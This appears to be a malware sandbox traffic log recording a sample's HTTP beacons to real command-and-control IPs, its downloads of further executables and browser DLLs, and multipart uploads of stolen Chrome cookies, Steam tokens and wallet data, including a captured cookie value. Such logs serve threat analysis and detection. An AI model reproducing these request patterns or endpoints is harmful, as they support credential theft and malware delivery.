Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000349001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIDHDHIDGIEBGIJEHHost: 91.202.233.158Content-Length: 7159Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/sqlite3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCHost: 91.202.233.158Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 2d 2d 0d 0a Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nU
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGDHost: 91.202.233.158Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 2d 2d 0d 0a Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file"------KKKKEHJKFCFCBFHIIDGD--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000354001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIEHost: 91.202.233.158Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 2d 2d 0d 0a Data Ascii: ------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="file"------JKJEHJKJEBGHJJKEBGIE--
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/freebl3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/mozglue.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000355001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/msvcp140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/neon.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/nss3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/softokn3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/vcruntime140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBHost: 91.202.233.158Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000356001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJHost: 91.202.233.158Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 2d 2d 0d 0a Data Ascii: ------FHIEBKKFHIEGCAKECGHJContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------FHIEBKKFHIEGCAKECGHJContent-Disposition: form-data; name="message"wallets------FHIEBKKFHIEGCAKECGHJ--
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJEHost: 91.202.233.158Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 2d 2d 0d 0a Data Ascii: ------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="message"files------GIIIIJDHJEGIECBGHIJE--
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 91.202.233.158Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file"------DGHJEHJJDAAAKEBGCFCA--
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIDHDHIDGIEBGIJEHHost: 91.202.233.158Content-Length: 140619Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000357001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIDHDHIDGIEBGIJEHHost: 91.202.233.158Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 2d 2d 0d 0a Data Ascii: ------DAEGIDHDHIDGIEBGIJEHContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------DAEGIDHDHIDGIEBGIJEHContent-Disposition: form-data; name="message"ybncbhylepme------DAEGIDHDHIDGIEBGIJEH--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBHost: 91.202.233.158Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 2d 2d 0d 0a Data Ascii: ------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AEBAFBGIDHCBFHIECFCB--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 37 34 46 43 41 46 39 31 36 41 36 44 43 45 41 46 34 41 33 38 32 33 39 43 46 30 39 30 33 30 33 30 33 35 39 38 38 39 42 34 36 44 41 30 44 36 43 36 34 39 41 42 30 30 38 32 46 44 30 32 41 44 38 43 37 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B574FCAF916A6DCEAF4A38239CF0903030359889B46DA0D6C649AB0082FD02AD8C7
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
